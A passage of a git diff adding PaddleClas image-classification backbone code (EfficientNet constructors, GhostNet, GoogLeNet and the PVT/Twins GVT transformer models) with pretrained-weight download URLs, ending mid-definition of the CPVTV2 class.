use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB4"]) + return model + + +def EfficientNetB5(padding_type='SAME', + override_params=None, + use_se=True, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b5', + padding_type=padding_type, + override_params=override_params, + use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB5"]) + return model + + +def EfficientNetB6(padding_type='SAME', + override_params=None, + use_se=True, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b6', + padding_type=padding_type, + override_params=override_params, + use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB6"]) + return model + + +def EfficientNetB7(padding_type='SAME', + override_params=None, + use_se=True, + pretrained=False, + use_ssld=False, + **kwargs): + model = EfficientNet( + name='b7', + padding_type=padding_type, + override_params=override_params, + use_se=use_se, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["EfficientNetB7"]) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/ghostnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/ghostnet.py new file mode 100644 index 0000000..4a16d8a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/ghostnet.py @@ -0,0 +1,361 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import math +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, AdaptiveAvgPool2D, Linear +from paddle.regularizer import L2Decay +from paddle.nn.initializer import Uniform, KaimingNormal + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "GhostNet_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/GhostNet_x0_5_pretrained.pdparams", + "GhostNet_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/GhostNet_x1_0_pretrained.pdparams", + "GhostNet_x1_3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/GhostNet_x1_3_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride=1, + groups=1, + act="relu", + name=None): + super(ConvBNLayer, self).__init__() + self._conv = Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=(kernel_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr( + initializer=KaimingNormal(), name=name + "_weights"), + bias_attr=False) + bn_name = name + "_bn" + + self._batch_norm = BatchNorm( + num_channels=out_channels, + act=act, + param_attr=ParamAttr( + name=bn_name + "_scale", regularizer=L2Decay(0.0)), + bias_attr=ParamAttr( + name=bn_name + "_offset", regularizer=L2Decay(0.0)), + moving_mean_name=bn_name + "_mean", + moving_variance_name=bn_name + "_variance") + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class SEBlock(nn.Layer): + def __init__(self, num_channels, reduction_ratio=4, name=None): + super(SEBlock, self).__init__() + self.pool2d_gap = AdaptiveAvgPool2D(1) + self._num_channels = num_channels + stdv = 1.0 / math.sqrt(num_channels * 1.0) + med_ch = num_channels // reduction_ratio + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_1_weights"), + bias_attr=ParamAttr(name=name + "_1_offset")) + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.excitation = Linear( + med_ch, + num_channels, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_2_weights"), + bias_attr=ParamAttr(name=name + "_2_offset")) + + def forward(self, inputs): + pool = self.pool2d_gap(inputs) + pool = paddle.squeeze(pool, axis=[2, 3]) + squeeze = self.squeeze(pool) + squeeze = F.relu(squeeze) + excitation = self.excitation(squeeze) + excitation = paddle.clip(x=excitation, min=0, max=1) + excitation = paddle.unsqueeze(excitation, axis=[2, 3]) + out = paddle.multiply(inputs, excitation) + return out + + +class GhostModule(nn.Layer): + def __init__(self, + in_channels, + output_channels, + kernel_size=1, + ratio=2, + dw_size=3, + stride=1, + relu=True, + name=None): + super(GhostModule, self).__init__() + init_channels = int(math.ceil(output_channels / ratio)) + new_channels = int(init_channels * (ratio - 1)) + self.primary_conv = ConvBNLayer( + in_channels=in_channels, + out_channels=init_channels, + kernel_size=kernel_size, + stride=stride, + groups=1, + act="relu" if relu else None, + name=name + "_primary_conv") + self.cheap_operation = ConvBNLayer( + in_channels=init_channels, + out_channels=new_channels, + kernel_size=dw_size, + stride=1, + groups=init_channels, + act="relu" if relu else None, + name=name + "_cheap_operation") + + def forward(self, inputs): + x = self.primary_conv(inputs) + y = self.cheap_operation(x) + out = paddle.concat([x, y], axis=1) + return out + + +class GhostBottleneck(nn.Layer): + def __init__(self, + in_channels, + hidden_dim, + output_channels, + kernel_size, + stride, + use_se, + name=None): + super(GhostBottleneck, self).__init__() + self._stride = stride + self._use_se = use_se + self._num_channels = in_channels + self._output_channels = output_channels + self.ghost_module_1 = GhostModule( + in_channels=in_channels, + output_channels=hidden_dim, + kernel_size=1, + stride=1, + relu=True, + name=name + "_ghost_module_1") + if stride == 2: + self.depthwise_conv = ConvBNLayer( + in_channels=hidden_dim, + out_channels=hidden_dim, + kernel_size=kernel_size, + stride=stride, + groups=hidden_dim, + act=None, + name=name + + "_depthwise_depthwise" # looks strange due to an old typo, will be fixed later. + ) + if use_se: + self.se_block = SEBlock(num_channels=hidden_dim, name=name + "_se") + self.ghost_module_2 = GhostModule( + in_channels=hidden_dim, + output_channels=output_channels, + kernel_size=1, + relu=False, + name=name + "_ghost_module_2") + if stride != 1 or in_channels != output_channels: + self.shortcut_depthwise = ConvBNLayer( + in_channels=in_channels, + out_channels=in_channels, + kernel_size=kernel_size, + stride=stride, + groups=in_channels, + act=None, + name=name + + "_shortcut_depthwise_depthwise" # looks strange due to an old typo, will be fixed later. + ) + self.shortcut_conv = ConvBNLayer( + in_channels=in_channels, + out_channels=output_channels, + kernel_size=1, + stride=1, + groups=1, + act=None, + name=name + "_shortcut_conv") + + def forward(self, inputs): + x = self.ghost_module_1(inputs) + if self._stride == 2: + x = self.depthwise_conv(x) + if self._use_se: + x = self.se_block(x) + x = self.ghost_module_2(x) + if self._stride == 1 and self._num_channels == self._output_channels: + shortcut = inputs + else: + shortcut = self.shortcut_depthwise(inputs) + shortcut = self.shortcut_conv(shortcut) + return paddle.add(x=x, y=shortcut) + + +class GhostNet(nn.Layer): + def __init__(self, scale, class_num=1000): + super(GhostNet, self).__init__() + self.cfgs = [ + # k, t, c, SE, s + [3, 16, 16, 0, 1], + [3, 48, 24, 0, 2], + [3, 72, 24, 0, 1], + [5, 72, 40, 1, 2], + [5, 120, 40, 1, 1], + [3, 240, 80, 0, 2], + [3, 200, 80, 0, 1], + [3, 184, 80, 0, 1], + [3, 184, 80, 0, 1], + [3, 480, 112, 1, 1], + [3, 672, 112, 1, 1], + [5, 672, 160, 1, 2], + [5, 960, 160, 0, 1], + [5, 960, 160, 1, 1], + [5, 960, 160, 0, 1], + [5, 960, 160, 1, 1] + ] + self.scale = scale + output_channels = int(self._make_divisible(16 * self.scale, 4)) + self.conv1 = ConvBNLayer( + in_channels=3, + out_channels=output_channels, + kernel_size=3, + stride=2, + groups=1, + act="relu", + name="conv1") + # build inverted residual blocks + idx = 0 + self.ghost_bottleneck_list = [] + for k, exp_size, c, use_se, s in self.cfgs: + in_channels = output_channels + output_channels = int(self._make_divisible(c * self.scale, 4)) + hidden_dim = int(self._make_divisible(exp_size * self.scale, 4)) + ghost_bottleneck = self.add_sublayer( + name="_ghostbottleneck_" + str(idx), + sublayer=GhostBottleneck( + in_channels=in_channels, + hidden_dim=hidden_dim, + output_channels=output_channels, + kernel_size=k, + stride=s, + use_se=use_se, + name="_ghostbottleneck_" + str(idx))) + self.ghost_bottleneck_list.append(ghost_bottleneck) + idx += 1 + # build last several layers + in_channels = output_channels + output_channels = int(self._make_divisible(exp_size * self.scale, 4)) + self.conv_last = ConvBNLayer( + in_channels=in_channels, + out_channels=output_channels, + kernel_size=1, + stride=1, + groups=1, + act="relu", + name="conv_last") + self.pool2d_gap = AdaptiveAvgPool2D(1) + in_channels = output_channels + self._fc0_output_channels = 1280 + self.fc_0 = ConvBNLayer( + in_channels=in_channels, + out_channels=self._fc0_output_channels, + kernel_size=1, + stride=1, + act="relu", + name="fc_0") + self.dropout = nn.Dropout(p=0.2) + stdv = 1.0 / math.sqrt(self._fc0_output_channels * 1.0) + self.fc_1 = Linear( + self._fc0_output_channels, + class_num, + weight_attr=ParamAttr( + name="fc_1_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr(name="fc_1_offset")) + + def forward(self, inputs): + x = self.conv1(inputs) + for ghost_bottleneck in self.ghost_bottleneck_list: + x = ghost_bottleneck(x) + x = self.conv_last(x) + x = self.pool2d_gap(x) + x = self.fc_0(x) + x = self.dropout(x) + x = paddle.reshape(x, shape=[-1, self._fc0_output_channels]) + x = self.fc_1(x) + return x + + def _make_divisible(self, v, divisor, min_value=None): + """ + This function is taken from the original tf repo. + It ensures that all layers have a channel number that is divisible by 8 + It can be seen here: + https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py + """ + if min_value is None: + min_value = divisor + new_v = max(min_value, int(v + divisor / 2) // divisor * divisor) + # Make sure that round down does not go down by more than 10%. + if new_v < 0.9 * v: + new_v += divisor + return new_v + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def GhostNet_x0_5(pretrained=False, use_ssld=False, **kwargs): + model = GhostNet(scale=0.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["GhostNet_x0_5"], use_ssld=use_ssld) + return model + + +def GhostNet_x1_0(pretrained=False, use_ssld=False, **kwargs): + model = GhostNet(scale=1.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["GhostNet_x1_0"], use_ssld=use_ssld) + return model + + +def GhostNet_x1_3(pretrained=False, use_ssld=False, **kwargs): + model = GhostNet(scale=1.3, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["GhostNet_x1_3"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/googlenet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/googlenet.py new file mode 100644 index 0000000..2252842 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/googlenet.py @@ -0,0 +1,229 @@ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "GoogLeNet": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/GoogLeNet_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +def xavier(channels, filter_size, name): + stdv = (3.0 / (filter_size**2 * channels))**0.5 + param_attr = ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_weights") + return param_attr + + +class ConvLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + + def forward(self, inputs): + y = self._conv(inputs) + return y + + +class Inception(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter1, + filter3R, + filter3, + filter5R, + filter5, + proj, + name=None): + super(Inception, self).__init__() + + self._conv1 = ConvLayer( + input_channels, filter1, 1, name="inception_" + name + "_1x1") + self._conv3r = ConvLayer( + input_channels, + filter3R, + 1, + name="inception_" + name + "_3x3_reduce") + self._conv3 = ConvLayer( + filter3R, filter3, 3, name="inception_" + name + "_3x3") + self._conv5r = ConvLayer( + input_channels, + filter5R, + 1, + name="inception_" + name + "_5x5_reduce") + self._conv5 = ConvLayer( + filter5R, filter5, 5, name="inception_" + name + "_5x5") + self._pool = MaxPool2D(kernel_size=3, stride=1, padding=1) + + self._convprj = ConvLayer( + input_channels, proj, 1, name="inception_" + name + "_3x3_proj") + + def forward(self, inputs): + conv1 = self._conv1(inputs) + + conv3r = self._conv3r(inputs) + conv3 = self._conv3(conv3r) + + conv5r = self._conv5r(inputs) + conv5 = self._conv5(conv5r) + + pool = self._pool(inputs) + convprj = self._convprj(pool) + + cat = paddle.concat([conv1, conv3, conv5, convprj], axis=1) + cat = F.relu(cat) + return cat + + +class GoogLeNetDY(nn.Layer): + def __init__(self, class_num=1000): + super(GoogLeNetDY, self).__init__() + self._conv = ConvLayer(3, 64, 7, 2, name="conv1") + self._pool = MaxPool2D(kernel_size=3, stride=2) + self._conv_1 = ConvLayer(64, 64, 1, name="conv2_1x1") + self._conv_2 = ConvLayer(64, 192, 3, name="conv2_3x3") + + self._ince3a = Inception( + 192, 192, 64, 96, 128, 16, 32, 32, name="ince3a") + self._ince3b = Inception( + 256, 256, 128, 128, 192, 32, 96, 64, name="ince3b") + + self._ince4a = Inception( + 480, 480, 192, 96, 208, 16, 48, 64, name="ince4a") + self._ince4b = Inception( + 512, 512, 160, 112, 224, 24, 64, 64, name="ince4b") + self._ince4c = Inception( + 512, 512, 128, 128, 256, 24, 64, 64, name="ince4c") + self._ince4d = Inception( + 512, 512, 112, 144, 288, 32, 64, 64, name="ince4d") + self._ince4e = Inception( + 528, 528, 256, 160, 320, 32, 128, 128, name="ince4e") + + self._ince5a = Inception( + 832, 832, 256, 160, 320, 32, 128, 128, name="ince5a") + self._ince5b = Inception( + 832, 832, 384, 192, 384, 48, 128, 128, name="ince5b") + + self._pool_5 = AdaptiveAvgPool2D(1) + + self._drop = Dropout(p=0.4, mode="downscale_in_infer") + self._fc_out = Linear( + 1024, + class_num, + weight_attr=xavier(1024, 1, "out"), + bias_attr=ParamAttr(name="out_offset")) + self._pool_o1 = AvgPool2D(kernel_size=5, stride=3) + self._conv_o1 = ConvLayer(512, 128, 1, name="conv_o1") + self._fc_o1 = Linear( + 1152, + 1024, + weight_attr=xavier(2048, 1, "fc_o1"), + bias_attr=ParamAttr(name="fc_o1_offset")) + self._drop_o1 = Dropout(p=0.7, mode="downscale_in_infer") + self._out1 = Linear( + 1024, + class_num, + weight_attr=xavier(1024, 1, "out1"), + bias_attr=ParamAttr(name="out1_offset")) + self._pool_o2 = AvgPool2D(kernel_size=5, stride=3) + self._conv_o2 = ConvLayer(528, 128, 1, name="conv_o2") + self._fc_o2 = Linear( + 1152, + 1024, + weight_attr=xavier(2048, 1, "fc_o2"), + bias_attr=ParamAttr(name="fc_o2_offset")) + self._drop_o2 = Dropout(p=0.7, mode="downscale_in_infer") + self._out2 = Linear( + 1024, + class_num, + weight_attr=xavier(1024, 1, "out2"), + bias_attr=ParamAttr(name="out2_offset")) + + def forward(self, inputs): + x = self._conv(inputs) + x = self._pool(x) + x = self._conv_1(x) + x = self._conv_2(x) + x = self._pool(x) + + x = self._ince3a(x) + x = self._ince3b(x) + x = self._pool(x) + + ince4a = self._ince4a(x) + x = self._ince4b(ince4a) + x = self._ince4c(x) + ince4d = self._ince4d(x) + x = self._ince4e(ince4d) + x = self._pool(x) + + x = self._ince5a(x) + ince5b = self._ince5b(x) + + x = self._pool_5(ince5b) + x = self._drop(x) + x = paddle.squeeze(x, axis=[2, 3]) + out = self._fc_out(x) + + x = self._pool_o1(ince4a) + x = self._conv_o1(x) + x = paddle.flatten(x, start_axis=1, stop_axis=-1) + x = self._fc_o1(x) + x = F.relu(x) + x = self._drop_o1(x) + out1 = self._out1(x) + + x = self._pool_o2(ince4d) + x = self._conv_o2(x) + x = paddle.flatten(x, start_axis=1, stop_axis=-1) + x = self._fc_o2(x) + x = self._drop_o2(x) + out2 = self._out2(x) + return [out, out1, out2] + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def GoogLeNet(pretrained=False, use_ssld=False, **kwargs): + model = GoogLeNetDY(**kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["GoogLeNet"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/gvt.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/gvt.py new file mode 100644 index 0000000..3553073 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/gvt.py @@ -0,0 +1,691 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from functools import partial + +import paddle +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.regularizer import L2Decay + +from .vision_transformer import trunc_normal_, normal_, zeros_, ones_, to_2tuple, DropPath, Identity, Mlp +from .vision_transformer import Block as ViTBlock + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "pcpvt_small": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/pcpvt_small_pretrained.pdparams", + "pcpvt_base": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/pcpvt_base_pretrained.pdparams", + "pcpvt_large": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/pcpvt_large_pretrained.pdparams", + "alt_gvt_small": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/alt_gvt_small_pretrained.pdparams", + "alt_gvt_base": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/alt_gvt_base_pretrained.pdparams", + "alt_gvt_large": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/alt_gvt_large_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class GroupAttention(nn.Layer): + """LSA: self attention within a group. + """ + + def __init__(self, + dim, + num_heads=8, + qkv_bias=False, + qk_scale=None, + attn_drop=0., + proj_drop=0., + ws=1): + super().__init__() + if ws == 1: + raise Exception("ws {ws} should not be 1") + if dim % num_heads != 0: + raise Exception( + "dim {dim} should be divided by num_heads {num_heads}.") + + self.dim = dim + self.num_heads = num_heads + head_dim = dim // num_heads + self.scale = qk_scale or head_dim**-0.5 + + self.qkv = nn.Linear(dim, dim * 3, bias_attr=qkv_bias) + self.attn_drop = nn.Dropout(attn_drop) + self.proj = nn.Linear(dim, dim) + self.proj_drop = nn.Dropout(proj_drop) + self.ws = ws + + def forward(self, x, H, W): + B, N, C = x.shape + h_group, w_group = H // self.ws, W // self.ws + total_groups = h_group * w_group + x = x.reshape([B, h_group, self.ws, w_group, self.ws, C]).transpose( + [0, 1, 3, 2, 4, 5]) + qkv = self.qkv(x).reshape([ + B, total_groups, self.ws**2, 3, self.num_heads, C // self.num_heads + ]).transpose([3, 0, 1, 4, 2, 5]) + q, k, v = qkv[0], qkv[1], qkv[2] + attn = paddle.matmul(q, k.transpose([0, 1, 2, 4, 3])) * self.scale + + attn = nn.Softmax(axis=-1)(attn) + attn = self.attn_drop(attn) + attn = paddle.matmul(attn, v).transpose([0, 1, 3, 2, 4]).reshape( + [B, h_group, w_group, self.ws, self.ws, C]) + + x = attn.transpose([0, 1, 3, 2, 4, 5]).reshape([B, N, C]) + x = self.proj(x) + x = self.proj_drop(x) + return x + + +class Attention(nn.Layer): + """GSA: using a key to summarize the information for a group to be efficient. + """ + + def __init__(self, + dim, + num_heads=8, + qkv_bias=False, + qk_scale=None, + attn_drop=0., + proj_drop=0., + sr_ratio=1): + super().__init__() + assert dim % num_heads == 0, f"dim {dim} should be divided by num_heads {num_heads}." + + self.dim = dim + self.num_heads = num_heads + head_dim = dim // num_heads + self.scale = qk_scale or head_dim**-0.5 + + self.q = nn.Linear(dim, dim, bias_attr=qkv_bias) + self.kv = nn.Linear(dim, dim * 2, bias_attr=qkv_bias) + self.attn_drop = nn.Dropout(attn_drop) + self.proj = nn.Linear(dim, dim) + self.proj_drop = nn.Dropout(proj_drop) + + self.sr_ratio = sr_ratio + if sr_ratio > 1: + self.sr = nn.Conv2D( + dim, dim, kernel_size=sr_ratio, stride=sr_ratio) + self.norm = nn.LayerNorm(dim) + + def forward(self, x, H, W): + B, N, C = x.shape + q = self.q(x).reshape( + [B, N, self.num_heads, C // self.num_heads]).transpose( + [0, 2, 1, 3]) + + if self.sr_ratio > 1: + x_ = x.transpose([0, 2, 1]).reshape([B, C, H, W]) + tmp_n = H * W // self.sr_ratio**2 + x_ = self.sr(x_).reshape([B, C, tmp_n]).transpose([0, 2, 1]) + x_ = self.norm(x_) + kv = self.kv(x_).reshape( + [B, tmp_n, 2, self.num_heads, C // self.num_heads]).transpose( + [2, 0, 3, 1, 4]) + else: + kv = self.kv(x).reshape( + [B, N, 2, self.num_heads, C // self.num_heads]).transpose( + [2, 0, 3, 1, 4]) + k, v = kv[0], kv[1] + + attn = paddle.matmul(q, k.transpose([0, 1, 3, 2])) * self.scale + attn = nn.Softmax(axis=-1)(attn) + attn = self.attn_drop(attn) + + x = paddle.matmul(attn, v).transpose([0, 2, 1, 3]).reshape([B, N, C]) + x = self.proj(x) + x = self.proj_drop(x) + return x + + +class Block(nn.Layer): + def __init__(self, + dim, + num_heads, + mlp_ratio=4., + qkv_bias=False, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm, + sr_ratio=1): + super().__init__() + self.norm1 = norm_layer(dim) + self.attn = Attention( + dim, + num_heads=num_heads, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + attn_drop=attn_drop, + proj_drop=drop, + sr_ratio=sr_ratio) + self.drop_path = DropPath(drop_path) if drop_path > 0. else Identity() + self.norm2 = norm_layer(dim) + mlp_hidden_dim = int(dim * mlp_ratio) + self.mlp = Mlp(in_features=dim, + hidden_features=mlp_hidden_dim, + act_layer=act_layer, + drop=drop) + + def forward(self, x, H, W): + x = x + self.drop_path(self.attn(self.norm1(x), H, W)) + x = x + self.drop_path(self.mlp(self.norm2(x))) + return x + + +class SBlock(ViTBlock): + def __init__(self, + dim, + num_heads, + mlp_ratio=4., + qkv_bias=False, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm, + sr_ratio=1): + super().__init__(dim, num_heads, mlp_ratio, qkv_bias, qk_scale, drop, + attn_drop, drop_path, act_layer, norm_layer) + + def forward(self, x, H, W): + return super().forward(x) + + +class GroupBlock(ViTBlock): + def __init__(self, + dim, + num_heads, + mlp_ratio=4., + qkv_bias=False, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm, + sr_ratio=1, + ws=1): + super().__init__(dim, num_heads, mlp_ratio, qkv_bias, qk_scale, drop, + attn_drop, drop_path, act_layer, norm_layer) + del self.attn + if ws == 1: + self.attn = Attention(dim, num_heads, qkv_bias, qk_scale, + attn_drop, drop, sr_ratio) + else: + self.attn = GroupAttention(dim, num_heads, qkv_bias, qk_scale, + attn_drop, drop, ws) + + def forward(self, x, H, W): + x = x + self.drop_path(self.attn(self.norm1(x), H, W)) + x = x + self.drop_path(self.mlp(self.norm2(x))) + return x + + +class PatchEmbed(nn.Layer): + """ Image to Patch Embedding. + """ + + def __init__(self, img_size=224, patch_size=16, in_chans=3, embed_dim=768): + super().__init__() + if img_size % patch_size != 0: + raise Exception( + f"img_size {img_size} should be divided by patch_size {patch_size}." + ) + + img_size = to_2tuple(img_size) + patch_size = to_2tuple(patch_size) + + self.img_size = img_size + self.patch_size = patch_size + self.H, self.W = img_size[0] // patch_size[0], img_size[ + 1] // patch_size[1] + self.num_patches = self.H * self.W + self.proj = nn.Conv2D( + in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) + self.norm = nn.LayerNorm(embed_dim) + + def forward(self, x): + B, C, H, W = x.shape + x = self.proj(x).flatten(2).transpose([0, 2, 1]) + x = self.norm(x) + H, W = H // self.patch_size[0], W // self.patch_size[1] + return x, (H, W) + + +# borrow from PVT https://github.com/whai362/PVT.git +class PyramidVisionTransformer(nn.Layer): + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + class_num=1000, + embed_dims=[64, 128, 256, 512], + num_heads=[1, 2, 4, 8], + mlp_ratios=[4, 4, 4, 4], + qkv_bias=False, + qk_scale=None, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0., + norm_layer=nn.LayerNorm, + depths=[3, 4, 6, 3], + sr_ratios=[8, 4, 2, 1], + block_cls=Block): + super().__init__() + self.class_num = class_num + self.depths = depths + + # patch_embed + self.patch_embeds = nn.LayerList() + self.pos_embeds = nn.ParameterList() + self.pos_drops = nn.LayerList() + self.blocks = nn.LayerList() + + for i in range(len(depths)): + if i == 0: + self.patch_embeds.append( + PatchEmbed(img_size, patch_size, in_chans, embed_dims[i])) + else: + self.patch_embeds.append( + PatchEmbed(img_size // patch_size // 2**(i - 1), 2, + embed_dims[i - 1], embed_dims[i])) + patch_num = self.patch_embeds[i].num_patches + 1 if i == len( + embed_dims) - 1 else self.patch_embeds[i].num_patches + self.pos_embeds.append( + self.create_parameter( + shape=[1, patch_num, embed_dims[i]], + default_initializer=zeros_)) + self.pos_drops.append(nn.Dropout(p=drop_rate)) + + dpr = [ + x.numpy()[0] + for x in paddle.linspace(0, drop_path_rate, sum(depths)) + ] # stochastic depth decay rule + + cur = 0 + for k in range(len(depths)): + _block = nn.LayerList([ + block_cls( + dim=embed_dims[k], + num_heads=num_heads[k], + mlp_ratio=mlp_ratios[k], + qkv_bias=qkv_bias, + qk_scale=qk_scale, + drop=drop_rate, + attn_drop=attn_drop_rate, + drop_path=dpr[cur + i], + norm_layer=norm_layer, + sr_ratio=sr_ratios[k]) for i in range(depths[k]) + ]) + self.blocks.append(_block) + cur += depths[k] + + self.norm = norm_layer(embed_dims[-1]) + + # cls_token + self.cls_token = self.create_parameter( + shape=[1, 1, embed_dims[-1]], + default_initializer=zeros_, + attr=paddle.ParamAttr(regularizer=L2Decay(0.0))) + + # classification head + self.head = nn.Linear(embed_dims[-1], + class_num) if class_num > 0 else Identity() + + # init weights + for pos_emb in self.pos_embeds: + trunc_normal_(pos_emb) + self.apply(self._init_weights) + + def _init_weights(self, m): + if isinstance(m, nn.Linear): + trunc_normal_(m.weight) + if isinstance(m, nn.Linear) and m.bias is not None: + zeros_(m.bias) + elif isinstance(m, nn.LayerNorm): + zeros_(m.bias) + ones_(m.weight) + + def forward_features(self, x): + B = x.shape[0] + for i in range(len(self.depths)): + x, (H, W) = self.patch_embeds[i](x) + if i == len(self.depths) - 1: + cls_tokens = self.cls_token.expand([B, -1, -1]) + x = paddle.concat([cls_tokens, x], dim=1) + x = x + self.pos_embeds[i] + x = self.pos_drops[i](x) + for blk in self.blocks[i]: + x = blk(x, H, W) + if i < len(self.depths) - 1: + x = x.reshape([B, H, W, -1]).transpose( + [0, 3, 1, 2]).contiguous() + x = self.norm(x) + return x[:, 0] + + def forward(self, x): + x = self.forward_features(x) + x = self.head(x) + return x + + +# PEG from https://arxiv.org/abs/2102.10882 +class PosCNN(nn.Layer): + def __init__(self, in_chans, embed_dim=768, s=1): + super().__init__() + self.proj = nn.Sequential( + nn.Conv2D( + in_chans, + embed_dim, + 3, + s, + 1, + bias_attr=paddle.ParamAttr(regularizer=L2Decay(0.0)), + groups=embed_dim, + weight_attr=paddle.ParamAttr(regularizer=L2Decay(0.0)), )) + self.s = s + + def forward(self, x, H, W): + B, N, C = x.shape + feat_token = x + cnn_feat = feat_token.transpose([0, 2, 1]).reshape([B, C, H, W]) + if self.s == 1: + x = self.proj(cnn_feat) + cnn_feat + else: + x = self.proj(cnn_feat) + x = x.flatten(2).transpose([0, 2, 1]) + return x + + +class CPVTV2(PyramidVisionTransformer): + """ + Use useful results from CPVT. PEG and GAP. + Therefore, cls token is no longer required. + PEG is used to encode the absolute position on the fly, which greatly affects the performance when input resolution + changes during the training (such as segmentation, detection) + """ + + def __init__(self, + img_size=224, + patch_size=4, + in_chans=3, + class_num=1000, + embed_dims=[64, 128, 256, 512], + num_heads=[1, 2, 4, 8], + mlp_ratios=[4, 4, 4, 4], + qkv_bias=False, + qk_scale=None, 